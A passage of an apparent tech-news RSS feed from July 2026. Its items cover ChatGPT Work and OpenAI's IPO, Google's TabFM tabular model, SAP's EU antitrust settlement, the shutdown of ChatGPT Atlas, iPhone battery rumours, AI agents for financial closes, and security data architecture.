job, but that's not my job," Geri said. "My job is to make an amazing product." He described ChatGPT Work as "a partner" and "an extension of me, certainly not a replacement," adding: "Everybody feels far more productive than before, but is also almost working harder than before, because you get to work on all the things you want to work on as opposed to the drudgery around it."</p><p>But Geri was also careful not to minimize the sophistication of the work the agent can handle. "I also don't want to say that it's only doing mundane tasks because, like something like hill climbing retention curves on a given feature is not mundane. It's actually really hard to do," he said. The distinction matters. If <a href="https://openai.com/index/chatgpt-for-your-most-ambitious-work/">ChatGPT Work</a> were merely automating calendar invitations and expense reports, it would be a convenience tool. The fact that Geri describes it compressing three months of analytical product work into a single week suggests something with far greater implications for how teams are structured and staffed.</p><h2><b>An IPO-bound company needs ChatGPT Work to prove enterprise AI can generate revenue</b></h2><p>The timing of ChatGPT Work's launch is impossible to separate from OpenAI's IPO trajectory. The company needs to demonstrate that it can convert its massive consumer user base into durable enterprise revenue — a narrative that becomes significantly more compelling with a product explicitly designed around professional workflows.</p><p>OpenAI said it is generating <a href="https://openai.com/index/accelerating-the-next-phase-ai/">$2 billion in revenue per month</a>, growing four times faster than Alphabet and Meta did at comparable stages, with enterprise now making up more than 40% of revenue and on track to reach parity with consumer by the end of 2026. But OpenAI remains heavily loss-making, and <a href="https://fortune.com/2025/11/26/is-openai-profitable-forecast-data-center-200-billion-shortfall-hsbc/">the company does not expect to reach profitability until around 2030</a>, with internal projections suggesting losses of $14 billion in 2026 alone.</p><p>The competitive dynamics are unprecedented. Anthropic filed for its own IPO on June 1 at a <a href="https://www.reuters.com/business/anthropic-raises-65-billion-now-valued-965-billion-2026-05-28/">$965 billion valuation</a>, setting up simultaneous public listings from the two most prominent AI startups in history. Whether both can sustain their lofty valuations under the scrutiny of public market investors will depend in large part on whether products like ChatGPT Work and Claude Cowork deliver measurable productivity gains to paying enterprise customers.</p><p>The launch also caps a product trajectory that began with <a href="https://chatgpt.com/business/?utm_source=google&amp;utm_medium=paid_search&amp;utm_campaign=GOOG_B_SEM_GBR_Core-Generic_MIX_BAU_ACQ_PER_MIX_ALL_NAMER_US_EN_042826&amp;c_id=23786098075&amp;c_agid=193601180617&amp;c_crid=806361782592&amp;c_kwid=aud-2471394551488:kwd-1933117063409&amp;c_ims=&amp;c_pms=9061275&amp;c_nw=g&amp;c_dvc=c&amp;gad_source=1&amp;gad_campaignid=23786098075&amp;gbraid=0AAAAA-I0E5fOwq9zncww98G13-WJxCPbT&amp;gclid=Cj0KCQjwsMLSBhD9ARIsAIpUTDonc5DPxzLgOO1GFI9yNaazBtf33Yums0oGIg1CR79ZRSiXK0LbcVkaAg9uEALw_wcB">ChatGPT Enterprise</a> in August 2023, accelerated through the release of OpenAI's Operator agent in January 2025, and continued through Operator's deprecation and shutdown on August 31, 2025, when its capabilities were folded into the ChatGPT agent framework. ChatGPT Work is the consolidation of those efforts into a single, unified product — one that pairs <a href="https://openai.com/index/gpt-5-6/">GPT-5.6's three model variants</a> (Sol for power, Luna for speed, and Terra for balanced everyday use) with a persistent cloud environment and an expanding library of MCP plugins.</p><h2><b>The future of work may already be running in the cloud</b></h2><p>When asked whether ChatGPT Work signals a shift toward a new kind of operating system — one where users interact with their computers primarily through an AI agent rather than through traditional mouse-and-keyboard interfaces — Geri stopped short of making sweeping predictions. But he hinted at the direction OpenAI sees ahead.</p><p>"Anybody who has worked with Codex or now ChatGPT Work will realize how exciting it is to interact with your environment and your computer via the agent," he said. "Especially in the desktop app, where the model has access to your entire machine and can interact with websites on your behalf — it's really able to be an extension of you and a real partner, and that certainly feels like the future."</p><p>At the end of the interview, Geri circled back to something personal. "I've never enjoyed work as much as I have in the last month using ChatGPT Work and Codex," he said — a striking admission from a product manager who, until recently, spent a meaningful share of his days clicking through the same interface five times in a row just to see if it would break. OpenAI is now asking 900 million users to believe that feeling scales. For a company weeks away from one of the largest public offerings in history, the answer to that question is worth roughly $850 billion.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google's TabFM skips per-dataset training and still predicts on tables it's never seen]]></title>
<description><![CDATA[The vast majority of business data is tabular — living in data warehouses, CRMs, and financial ledgers — yet building a reliable model from it still means training a new one from scratch for every dataset, then maintaining hyperparameter tuning loops, feature engineering, and retraining pipelines...]]></description>
<link>https://tsecurity.de/de/3660555/it-nachrichten/googles-tabfm-skips-per-dataset-training-and-still-predicts-on-tables-its-never-seen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660555/it-nachrichten/googles-tabfm-skips-per-dataset-training-and-still-predicts-on-tables-its-never-seen/</guid>
<pubDate>Fri, 10 Jul 2026 20:03:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The vast majority of business data is tabular — living in data warehouses, CRMs, and financial ledgers — yet building a reliable model from it still means training a new one from scratch for every dataset, then maintaining hyperparameter tuning loops, feature engineering, and retraining pipelines to fight data drift. Google Research is proposing a way around that: <a href="https://research.google/blog/introducing-tabfm-a-zero-shot-foundation-model-for-tabular-data/">a new foundation model called TabFM</a> that treats tabular prediction as an in-context learning problem instead.</p><p>It can generate predictions for a new, unseen table in a single forward pass. For enterprise developers and AI engineers, this reduces the time-to-production from weeks of pipeline engineering to a single API call.</p><h2>The challenge with traditional ML</h2><p>To extract reliable predictions from a gradient-boosted tree, data scientists must build and maintain complex data pipelines. They have to clean messy inputs, impute missing values, encode categorical variables into numerical formats, and engineer custom feature crosses.</p><p>Once the data is ready, they must run repetitive hyperparameter optimization loops, searching across learning rates, tree depths, subsampling ratios, and regularization grids to find the best configuration. </p><p>Once deployed, these traditional models "incur ongoing operational debt through data drift monitoring and retraining pipelines to stay accurate," Weihao Kong, Research Scientist at Google Research, told VentureBeat.</p><p>Meanwhile, the rest of the AI industry has moved on. Generative AI models for text and computer vision have seamlessly shifted to zero-shot inference, where a model can perform a completely new task simply by being prompted with context. </p><p>Large language models (LLMs) already excel at <a href="https://venturebeat.com/business/fine-tuning-vs-in-context-learning-new-research-guides-better-llm-customization-for-real-world-tasks">in-context learning</a>, so why can't we just feed tables into an off-the-shelf LLM?</p><p>Because LLMs are trained on natural language rather than structured data, they struggle to process tables directly. First, their context limits are exhausted quickly by medium-sized tables containing just a few thousand rows and hundreds of columns. Second, LLMs suffer from tokenization inefficiency, awkwardly splitting numerical values and destroying mathematical precision. Finally, they suffer from structural blindness. When a 2D table is serialized as a 1D text string, LLMs lose track of which value belongs to which row and column as the table grows. </p><p>"That's why, today, it is far more effective to use an LLM to write the code that handles feature engineering and calls XGBoost than to ask the LLM to read the table itself," Kong said.</p><h2>What is TabFM?</h2><p>To run inference with TabFM, you do not update any model weights. Instead, you take your historical examples (the training rows with their known labels) and your target rows (the new data you want to predict) and pass them to the model as a single, unified prompt. The model learns to interpret the relationships between columns and rows directly from this context at runtime.</p><p>For example, consider an enterprise analyst trying to predict customer churn. Instead of building a bespoke data pipeline and training an XGBoost model, they can simply pass a sample of historical user session data alongside a new, active session into TabFM. In one forward pass, the model returns an instant churn probability. </p><p>TabFM overcomes the limitations of LLMs by treating the data as a grid, preserving its structural integrity without forcing it into a single-dimensional text string.</p><p>To effectively process diverse tabular structures while enabling scalable zero-shot prediction, TabFM synthesizes the strengths of earlier experimental architectures, TabPFN and TabICL. <a href="https://github.com/PriorLabs/tabpfn">TabPFN</a>, developed by Prior Labs, first proved that a transformer architecture could perform zero-shot classification on small tables, though it struggled to scale computationally to larger datasets. </p><p>Later, <a href="https://dl.acm.org/doi/10.5555/3780338.3782366">TabICL</a>, developed by France's National Research Institute for Digital Science and Technology, addressed this bottleneck by introducing row compression, allowing in-context learning to efficiently process much larger tables. </p><p>TabFM combines TabPFN's deep feature contextualization with TabICL's efficient compression into a novel hybrid design built on three key mechanisms:</p><p><b>1. Alternating row and column attention:</b> The raw table is first processed through a multilayer attention module that alternates across both columns (features) and rows (examples). By continuously attending across these two dimensions, the model natively captures complex feature interactions. This deep contextualization does the heavy lifting that would usually require tedious manual feature crafting by data scientists.</p><p><b>2. Row compression:</b> Following this contextualization, the cross-attended information for each row is compressed into a single, dense vector representation. TabICL pioneered this by using CLS tokens to compress a row's rich information into one vector, "in contrast to TabPFN v2, v2.5, and v2.6, which attend over the full cell grid throughout the network," Kong explained. This drastically shrinks the computational footprint.</p><p><b>3. In-context learning (ICL):</b> A causal Transformer then operates on this sequence of compressed embeddings. This Transformer model uses the attention mechanism of TabICL to attend over these dense row vectors, drastically reducing the computation cost and allowing the model to process large datasets efficiently.</p><p>A major selling point of TabFM is its pretraining recipe. The model was trained entirely on hundreds of millions of synthetic datasets. These datasets were dynamically generated using structural causal models (SCMs) that incorporate a wide variety of random functions. By training exclusively on synthetic SCMs, TabFM learned the fundamental mathematical priors of how tabular features interact without ingesting real-world, confidential CSV files.</p><h2>TabFM in action</h2><p>To test the model's capabilities, Google researchers benchmarked TabFM on TabArena, a comprehensive evaluation suite spanning 51 diverse tabular datasets across 38 classification and 13 regression tasks.</p><p>On these public benchmarks, TabFM's zero-shot predictions already match or beat heavily tuned supervised baselines. However, Google is careful to note that this does not automatically mean TabFM will universally dethrone bespoke, hyper-optimized production models on every enterprise workload.</p><p>"Instead of replacing hyper-optimized production models, the true practical business value it unlocks for lean engineering teams is velocity," Kong said. "It allows data analysts and backend engineers to instantly spin up high-quality baseline models without a dedicated data science team managing a complex lifecycle."</p><p>For advanced practitioners looking to squeeze out maximum accuracy, the research team also introduced a "TabFM-Ensemble" configuration. By running the model through 32 distinct variations and blending the results, TabFM pushes the performance even further. </p><h2>Getting started, trade-offs, and the cloud future</h2><p>The shift to in-context learning for tables introduces a new economic trade-off that engineering teams must consider. </p><p>With traditional algorithms, training is slow and expensive, but inference is lightning-fast and cheap. TabFM flips this dynamic. While training time drops to zero, inference becomes significantly heavier. Because the model must process the entire historical dataset as context during every single prediction, it requires more compute and memory at runtime. </p><p>In this new paradigm, "traditional machine learning training becomes the 'prefill' phase (KV caching) in the context window," Kong said. While this prefill cost is steep, it is paid only once per table, and the cache is reused across subsequent queries. "The catch is prediction latency, which no amount of caching removes," Kong added. Every new prediction requires a pass through a large transformer. "Any production API requiring single-digit-millisecond response times cannot tolerate TabFM's forward-pass overhead."</p><p>For developers looking to evaluate the model today, the barrier to entry is low. Google designed TabFM as a drop-in replacement for traditional ML workflows, offering a scikit-learn compatible API (TabFMClassifier and TabFMRegressor). It natively handles mixed numerical and categorical columns, works directly with pandas DataFrames, and requires no manual ordinal encoders or numerical scalers. The library supports both JAX and PyTorch backends.</p><p>However, enterprise teams need to be aware of current limitations and licensing restrictions. The model architecture has a hard limit of 10 output classes for classification tasks, and it is optimized for tables with up to 500 features. More importantly, while Google released the <a href="https://github.com/google-research/tabfm">underlying codebase</a> under the permissive Apache 2.0 license, the pre-trained model weights are published on <a href="https://huggingface.co/google/tabfm-1.0.0-pytorch">Hugging Face</a> under a strict tabfm-non-commercial-v1.0 license. Developers can evaluate the model internally, but it cannot be deployed in commercial products yet.</p><p>Looking ahead, Google is addressing the commercial deployment friction through its cloud ecosystem. TabFM is being integrated directly into Google BigQuery, allowing analysts to run zero-shot predictions natively via an “AI.PREDICT” command. By putting foundation model inference right next to the data warehouse, TabFM could soon make complex tabular machine learning as accessible as a basic database query.</p><p>In practice, TabFM shines in rapid prototyping, high data drift environments, and small to medium-sized datasets under 100,000 rows. Conversely, teams should stick to traditional models for strict, ultra-low latency APIs, or massive tables exceeding one million rows, which currently require aggressive row sampling that degrades the foundation model's competitive advantage.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP Makes It Easier For Customers To Shop For Legacy Product Support, Ending EU Antitrust Probe]]></title>
<description><![CDATA[An anonymous reader quotes a report from The Register: The European Commission has ended an investigation into possible anticompetitive practices after SAP agreed to abolish reinstatement fees and reduce back-maintenance fees. The move could reduce barriers for customers considering third-party s...]]></description>
<link>https://tsecurity.de/de/3660331/it-security-nachrichten/sap-makes-it-easier-for-customers-to-shop-for-legacy-product-support-ending-eu-antitrust-probe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660331/it-security-nachrichten/sap-makes-it-easier-for-customers-to-shop-for-legacy-product-support-ending-eu-antitrust-probe/</guid>
<pubDate>Fri, 10 Jul 2026 18:12:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from The Register: The European Commission has ended an investigation into possible anticompetitive practices after SAP agreed to abolish reinstatement fees and reduce back-maintenance fees. The move could reduce barriers for customers considering third-party support for products nearing the end of their vendor support terms, including thousands of large businesses that rely on SAP ERP Central Component (ECC) to run their business operations. SAP's mainstream support for ECC ends in December 2027, while customers can opt for extended maintenance until December 2030 by paying an additional two percentage points on their maintenance fees. The most recent figures from Gartner showed that in Q4 2024 only 39 percent of worldwide ECC customers -- from a total of 35,000 -- had bought or subscribed to licenses to start their transition to SAP S/4HANA, the replacement ERP product.
 
In September last year, the European Commission launched a formal investigation into SAP's behavior in the aftermarket for maintenance and support services in Europe. It said it was responding to concerns that SAP restricted competition in this crucial aftermarket by making it harder for rivals to compete, leaving European customers with fewer choices and higher costs. In October, SAP published its response. "SAP's commitments aim at improving the financial attractiveness for customers who wish to reinstate SAP maintenance and support services. Thus, future costs associated with reinstatement will not financially prevent customers from choosing to terminate SAP maintenance and support for a given period of time," the document said (PDF).
 
SAP has now agreed to abolish reinstatement fees and reduce back maintenance fees charged to customers who return to SAP's support after a period of absence, the Commission confirmed. It also agreed to clarify conditions that allow customers to choose different maintenance and support service providers and different levels of support from SAP. The agreement is relevant to customers considering third-party support to extend their use of ECC beyond vendor maintenance. For example, last year, European retailer Kingfisher -- owner of well-known UK brands B&amp;Q and Screwfix -- told a Gartner conference it had chosen Rimini Street to support ECC 6.0 because it saw insufficient value in migrating to SAP S/4HANA. [...] The commitments offered by SAP will remain in force globally for ten years.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=SAP+Makes+It+Easier+For+Customers+To+Shop+For+Legacy+Product+Support%2C+Ending+EU+Antitrust+Probe%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F10%2F0846241%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F10%2F0846241%2Fsap-makes-it-easier-for-customers-to-shop-for-legacy-product-support-ending-eu-antitrust-probe%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/10/0846241/sap-makes-it-easier-for-customers-to-shop-for-legacy-product-support-ending-eu-antitrust-probe?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ChatGPT Atlas Is Shutting Down, But Here Are Some Popular Alternatives]]></title>
<description><![CDATA[OpenAI is officially pulling the plug on its dedicated web browser, but that does not mean you have to give up on smart web navigation. Since ChatGPT Atlas failed to capture a massive audience, the company decided to shut it down and move its core features to the desktop app. If you still want a ...]]></description>
<link>https://tsecurity.de/de/3660299/ios-mac-os/chatgpt-atlas-is-shutting-down-but-here-are-some-popular-alternatives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660299/ios-mac-os/chatgpt-atlas-is-shutting-down-but-here-are-some-popular-alternatives/</guid>
<pubDate>Fri, 10 Jul 2026 18:01:21 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenAI is officially pulling the plug on its dedicated web browser, but that does not mean you have to give up on smart web navigation. Since ChatGPT Atlas failed to capture a massive audience, the company decided to shut it down and move its core features to the desktop app. If you still want a dedicated browser built around artificial intelligence tools, you have several great alternatives available.



Popular alternatives like Comet and Dia lead the browser pack



While the ChatGPT Atlas browser is shutting down, other platforms are stepping up to fill the gap. Perplexity regularly updates its Comet browser, which works nicely with different artificial intelligence systems. Comet started on the Mac but is now making its way to mobile devices like the iPhone and iPad.



Another big option comes from The Browser Company, which recently launched Dia as the official successor to Arc. If you want something experimental, Opera Neon bills itself as an AI browser, though it requires a monthly subscription. A newcomer called Aside is also gaining attention as a lightweight choice for Mac users who want to keep things simple.



Chrome extensions and Safari offer simpler ways to stay connected



You do not necessarily need a brand-new browser to get these smart features. Before ending Atlas, OpenAI released a dedicated Chrome extension that brings the chatbot directly to any browser built on the Chromium engine. Google also includes Gemini right inside Chrome, giving users multiple ways to get help without switching their primary internet tool.



For users who want to keep their current setup untouched, sticking with Safari is completely fine. You can simply use standard web browsers and rely on background software like ChatGPT Codex to handle your complex online tasks. Even with Atlas gone, having smart tools in your daily internet routine is easier than ever to set up.]]></content:encoded>
</item>
<item>
<title><![CDATA[No, EU iPhones won't have a removable battery door in 2027]]></title>
<description><![CDATA[Despite what you might have seen on the internet, iPhones sold in the European Union will not have a removable back panel for easy battery replacement, and they probably never will. Here's why.iPhone batteries aren't changing any time soon. Image credit: AppleYou've probably seen AI TikTok slop a...]]></description>
<link>https://tsecurity.de/de/3659711/ios-mac-os/no-eu-iphones-wont-have-a-removable-battery-door-in-2027/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659711/ios-mac-os/no-eu-iphones-wont-have-a-removable-battery-door-in-2027/</guid>
<pubDate>Fri, 10 Jul 2026 14:40:13 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Despite what you might have seen on the internet, <a href="https://appleinsider.com/inside/iphone" title="iPhone" data-kpt="1">iPhones</a> sold in the European Union will not have a removable back panel for easy battery replacement, and they probably never will. Here's why.<br><br><div><img src="https://photos5.appleinsider.com/gallery/59757-122185-58508-119228-000-lead-battery-xl-xl.jpg" alt="A battery being taken out of an iPhone [Apple]" height="720"><br><span>iPhone batteries aren't changing any time soon. Image credit: Apple</span></div><br>You've probably seen AI TikTok slop and <a href="https://www.reddit.com/r/Snorkblot/comments/1usfgup/right_to_repair/#lightbox">random Reddit posts</a> that claim the EU will force Apple to bring user-replaceable batteries to the iPhone in 2027. But in what should be a surprise to nobody, they're all wrong.<br><br>But like so much viral-yet-false information, there's a kernel of truth to it. The EU does have new iPhone battery legislation that comes into effect in 2027. Apple already meets the requirements.<br><br><br> <a href="https://appleinsider.com/articles/26/07/10/no-eu-iphones-wont-have-a-removable-battery-door-in-2027?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244922?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Accelerating financial closes with help from AI agents: A pragmatic guide]]></title>
<description><![CDATA[Historically, financial closes required were tedious, manual-intensive processes, which makes them excellent candidates for agentification. AI agents can handle much of the “dirty work” associated with integrating financial data from various sources, reconciling transactions and so on. That said,...]]></description>
<link>https://tsecurity.de/de/3659462/it-nachrichten/accelerating-financial-closes-with-help-from-ai-agents-a-pragmatic-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659462/it-nachrichten/accelerating-financial-closes-with-help-from-ai-agents-a-pragmatic-guide/</guid>
<pubDate>Fri, 10 Jul 2026 13:03:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Historically, financial closes required were tedious, manual-intensive processes, which makes them excellent candidates for agentification. AI agents can handle much of the “dirty work” associated with integrating financial data from various sources, reconciling transactions and so on. That said, there are limits on how far <a href="https://www.ibm.com/think/topics/ai-agents" rel="nofollow">AI agents</a> can go in streamlining and accelerating the closing process. It’s unrealistic for businesses to remove humans from the picture entirely.</p>



<p>With this caveat in mind, here’s a look at practical approaches to driving more efficient financial closings with help from AI agents. To ground the conversation, I’ll focus on what the process might look like within environments based on SAP, although many of these lessons apply to any organization and tech stack.</p>



<h2 class="wp-block-heading">How AI agents can accelerate financial closes</h2>



<p>Although ERP systems like SAP house most or all of an organization’s financial data within a central system, closing out the books still tends to be a highly complex process, hampered by challenges like the following:</p>



<ul class="wp-block-list">
<li>Master Data reconciliation</li>



<li>Working through huge volumes of journaling</li>



<li>Identifying and resolving transaction reconciliation errors</li>



<li>Ensuring compliance with governance and regulatory requirements</li>
</ul>



<p>These are all areas where AI agents can help, even if <a href="https://www.sap.com/products/financial-management/advanced-financial-closing.html">SAP’s Advanced Financial Closin</a>g is used. For example, instead of requiring humans to assess each irregular transaction manually, businesses can employ agents to review the situation and suggest a resolution. Agents also excel at tasks like integrating multiple data sources, then identifying and addressing redundancies or inconsistencies across them.</p>



<p>Similarly, agents can continuously monitor financial workflows throughout the close cycle, flagging anomalies and potential bottlenecks before they delay reporting deadlines. They can automatically collect supporting documentation, validate data against predefined business rules and route exceptions to the appropriate stakeholders for review.</p>



<p>By reducing the amount of repetitive manual work required during closing, AI agents help finance teams focus on higher-value analysis and decision-making. This can lead to faster close times, improved accuracy and greater confidence in the integrity of financial reporting.</p>



<h2 class="wp-block-heading">The limitations of agents for closing the books</h2>



<p>That said, agents can’t handle every aspect of the closing process entirely on their own. Two key limitations apply. The first is that, as with any <a href="https://en.wikipedia.org/wiki/Large_language_model">LLM-powered technology</a>, agents are at risk of making inaccurate decisions or inferences. Businesses can’t blindly trust agents to interpret financial data accurately all of the time. A second factor is that, due to strict regulatory requirements, it’s essential in most cases for humans to sign off on financial accounts. Telling regulators or auditors that you know your books are accurate because an AI agent told you so is not a recipe for compliance success.</p>



<p>Because of these limitations, a healthy perspective on AI agents in financial closing contexts is to think of them as a way to improve visibility, agility and efficiency, not as a replacement for people. Agents can make recommendations, but humans need to be the ones who review, validate and sign off on any actions before they are final.</p>



<h2 class="wp-block-heading">Integrating AI agents into the closing process in SAP</h2>



<p>How can organizations actually take advantage of AI agents to help with closing?</p>



<p>The answer is complicated because every business’s books and closing process are different. This means that, despite the growing inventory of AI agents now available on platforms like SAP, it’s unrealistic to expect to “drag and drop” agents into existing closing workflows and have them do what they need.</p>



<p>Instead, many businesses will find that they need to build custom agentic solutions. Often, they’ll benefit from implementing multiple agents targeted at different tasks, e.g., accounts receivable, accounts payable and foreign currency exchanges, along with an <a href="https://learn.microsoft.com/en-us/azure/architecture/ai-ml/guide/ai-agent-design-patterns">orchestrator agent</a> that oversees them all. Each agent will need to be tailored for the organization’s data sources, governance and compliance obligations, etc.</p>



<p>In addition, organizations must carefully define how agents interact with financial systems and employees. While some activities can be automated end-to-end, others require human review and approval to satisfy internal controls and regulatory requirements. Establishing clear workflows, escalation paths and audit trails is essential to ensure that agent-driven processes remain transparent and trustworthy. Organizations also need to invest in testing and validation to confirm that agents produce accurate results and can handle exceptions without introducing new risks into the close process.</p>



<p>The fact that SAP itself is a complex platform, with native agentic capabilities fully supported only in the latest versions, further complicates the agentification of the closing process. Enterprises need to assess the agentic support level available within the SAP version they use, then determine the extent to which they can leverage SAP’s own agents versus working with third-party agents.</p>



<p>Another key consideration is data quality. AI agents can only perform effectively when they have access to complete, accurate and timely financial information. Organizations may need to improve <a href="https://cloud.google.com/learn/what-is-data-governance" rel="nofollow">data governance</a> practices and address integration challenges before agents can deliver meaningful value. The extent to which they can do this easily depends, in large part, on how healthy their underlying SAP data governance practices are.</p>



<p>All of the above means that taking advantage of agents to accelerate closes and other financial workflows within SAP is no mean feat. It requires deep technical expertise in both agentic technology and the complex SAP software portfolio. But the investment is worth it for organizations seeking to reduce the uncertainty and slowness traditionally associated with closing the books. Over time, well-designed agentic workflows can help finance teams spend less time on manual reconciliation and exception handling while enabling faster, more predictable financial close cycles.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why fixing your data architecture matters more than upgrading your detection models]]></title>
<description><![CDATA[Security leaders have been on a spending sprint. The global AI in cybersecurity market is valued at $44 billion in 2026 and is projected to reach $213 billion by 2034, a trajectory that reflects genuine belief that machine learning will close the gap between the volume of threats and the capacity...]]></description>
<link>https://tsecurity.de/de/3656446/it-security-nachrichten/why-fixing-your-data-architecture-matters-more-than-upgrading-your-detection-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656446/it-security-nachrichten/why-fixing-your-data-architecture-matters-more-than-upgrading-your-detection-models/</guid>
<pubDate>Thu, 09 Jul 2026 11:08:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Security leaders have been on a spending sprint. The global AI in cybersecurity market is valued at <a href="https://www.fortunebusinessinsights.com/artificial-intelligence-in-cybersecurity-market-113125">$44 billion in 2026 and is projected to reach $213 billion by 2034</a>, a trajectory that reflects genuine belief that machine learning will close the gap between the volume of threats and the capacity of human analysts. That belief is not wrong. What is wrong is where most organizations focus when the tools stop working.</p>



<p>When AI-driven detection underperforms, the instinct is to tune the algorithm, retrain the model or push the vendor for a better product. The real culprit, in most cases, is sitting upstream in the data pipelines long before any model ever sees an event. Fragmented telemetry, inconsistent schemas and stale behavioral baselines are quietly degrading the performance of AI security systems across the enterprise. Fixing the algorithm without fixing the data is like recalibrating a scale while the input keeps changing.</p>



<h2 class="wp-block-heading">The tool sprawl problem nobody talks about at the data level</h2>



<p>Most large enterprises are not working with clean, unified security data. They are working with decades of accumulated infrastructure decisions. <a href="https://venturebeat.com/business/enterprises-struggle-with-security-monitoring-tool-sprawl">Research shows the average enterprise runs 83 different security products from 29 separate vendors</a>, and SOC teams absorb nearly 3,000 alerts per day, with 63 percent going unaddressed. Each of those tools generates its own telemetry in its own format, with its own field naming conventions, timestamp standards and metadata schemas.</p>



<p>Human analysts develop an intuition for navigating that inconsistency. Machine learning models do not. A behavioral detection model trained to correlate authentication events across your identity platform, your endpoint agent and your cloud access broker will produce unreliable results if those three tools call the same field three different names. The model is not broken. It is being fed structurally incoherent data and asked to find patterns in the noise.</p>



<h2 class="wp-block-heading">What schema drift actually costs you</h2>



<p>This is where the problem becomes invisible and expensive. Schema drift, the gradual mutation of data formats across security pipelines over time, rarely triggers an alert. Log formats change when vendors push updates. New telemetry sources add fields that did not previously exist. Identity platforms rename attributes without notifying the security engineering team. Over months, the statistical patterns that trained your behavioral detection models no longer match the data those models are receiving in production.</p>



<p>The downstream effects are exactly what most CISOs are already experiencing: Elevated false positive rates, analyst fatigue and detection gaps that only become visible after an incident. What most security leaders do not realize is that those symptoms trace back to the data layer, not the algorithm layer. <a href="https://www.gartner.com/en/newsroom/press-releases/2026-1-15-gartner-says-worldwide-ai-spending-will-total-2-point-5-trillion-dollars-in-2026">Gartner projects that through 2026, organizations will abandon 60 percent of AI projects due to insufficient data quality</a>, and the pattern is playing out in security operations as visibly as anywhere else.</p>



<h2 class="wp-block-heading">Stale baselines are an attacker advantage</h2>



<p>The data freshness problem is underappreciated as a security risk. Behavioral AI models build baselines from historical activity. In fast-changing enterprise environments, those baselines go stale faster than most security teams recognize.</p>



<p>The shift to hybrid work changed access patterns dramatically. Cloud adoption changed which resources users interact with and when. Mergers and acquisitions introduce new user populations with entirely different behavioral profiles. When AI models evaluate today’s activity against baselines built from a workforce and infrastructure that no longer exist, the results are predictable: Legitimate access triggers anomaly alerts, and sophisticated attackers who study baseline patterns can blend in precisely because the model’s assumptions have not kept up with the environment.</p>



<p><a href="https://www.ibm.com/think/insights/cost-of-poor-data-quality">IBM research on data quality costs</a> puts the average annual cost of poor data quality at $12.9 million per organization. In a security context, that figure does not capture the incident response costs, regulatory exposure or reputational damage that follow from a detection failure rooted in bad data architecture.</p>



<h2 class="wp-block-heading">The organizational gap that keeps this problem in place</h2>



<p>The reason this issue persists is structural. Data pipelines are typically managed by data or infrastructure engineering teams. Detection models are owned by SOC analysts or threat intelligence teams. The AI systems that sit between those two functions often belong to neither. When detection quality drops, security teams tune parameters. Engineering teams focus on pipeline cost and availability. Nobody owns the analytical consistency of the data flowing through the system, because no one’s job description covers that specific gap.</p>



<p>This is a leadership problem before it is a technical one. CISOs who want AI security tools to perform as advertised need to close that ownership gap and treat security telemetry with the same rigor applied to other business-critical data assets.</p>



<h2 class="wp-block-heading">Three priorities for security leaders</h2>



<p>Addressing this does not require a platform replacement or a multi-year transformation program. It requires deliberate attention to three areas:</p>



<ol class="wp-block-list">
<li><strong>Standardize telemetry schemas across your security stack.</strong> A unified schema, even an imperfect one, gives machine learning models a consistent foundation. Establish naming conventions for common fields, normalize timestamp formats and document deviations when vendors cannot comply. This is not a one-time project. It is ongoing governance.</li>



<li><strong>Build data quality monitoring into every ingestion pipeline.</strong> Before any event reaches an ML system, validate it for missing fields, timestamp anomalies and schema deviations. Catching data drift at ingestion is far cheaper than diagnosing detection failures after a real incident or after an attacker has already moved laterally.</li>



<li><strong>Apply governance discipline to security data, not just business data.</strong> Lineage tracking, validation rules and version-controlled schemas belong in security pipelines as much as they belong in financial reporting pipelines. Security telemetry is a critical business asset and should be managed accordingly.</li>
</ol>



